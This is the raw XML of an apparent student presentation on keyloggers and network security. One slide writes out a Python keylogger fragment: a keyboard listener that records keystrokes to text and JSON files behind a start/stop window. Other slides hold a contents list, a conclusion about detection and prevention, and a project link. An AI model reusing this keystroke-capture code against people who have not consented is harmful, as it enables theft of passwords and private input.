                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B13A99-AD2A-7DF1-F53C-AAB6F64DD42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233219" y="481330"/>
            <a:ext cx="4748981" cy="6924973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(str(keys))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>root = Tk()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>("Keylogger")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16926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EE970094-A62D-37D9-72A0-46A1DA2DD3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800" y="2115515"/>
            <a:ext cx="3124200" cy="2705376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{679A7745-59E8-6228-33A5-1F180E5B5D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24400" y="1657124"/>
            <a:ext cx="6248400" cy="1619476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{719363F9-43DB-2328-F649-AE8CD1ED230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648200" y="3995842"/>
            <a:ext cx="6934200" cy="8559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E6D72-9EC9-5F25-C805-ED61E0F1733C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="762000"/>
            <a:ext cx="3276600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Conclusion:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67A9CF6-ABB3-1167-DF3B-D08BC8286444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1223665"/>
            <a:ext cx="8001000" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In today's digital landscape, keyloggers present a significant threat to network security, capable of capturing sensitive information and compromising data integrity. Addressing this threat requires a comprehensive and multi-faceted approach, encompassing advanced detection, robust prevention, and effective mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strategies.Ultimately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, the continuous improvement of keylogger detection and network security measures is crucial for protecting sensitive information and maintaining the integrity of digital operations. By staying ahead of emerging threats and prioritizing user needs, we can ensure a safer and more secure digital environment for all.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85943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1FCEC-9BAD-1EC0-8A01-2EFFE9DD6C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2590800"/>
            <a:ext cx="8998974" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>https://github.com/TARAK-123308/project-kali.git</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70470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48D6B7-E5BE-3F6F-AF34-D670E90F6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0176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09248" y="2439626"/>
            <a:ext cx="9784080" cy="1978747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4250" dirty="0"/>
              <a:t>KEYLOGGER AND NETWORK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1E16936-E7F8-BDF7-81C4-FF8F1A29B558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976501" y="1314108"/>
            <a:ext cx="8709002" cy="6617196"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key Contents:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Introduction to Keylogger</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Problem Statement</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Project Overview</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Who are the end users?</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="25" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="25" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>lu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-345" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="35" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="60" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-295" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="25" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>lu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="25" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="20" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Wow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="85" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="20" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" spc="15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="30" dirty="0">
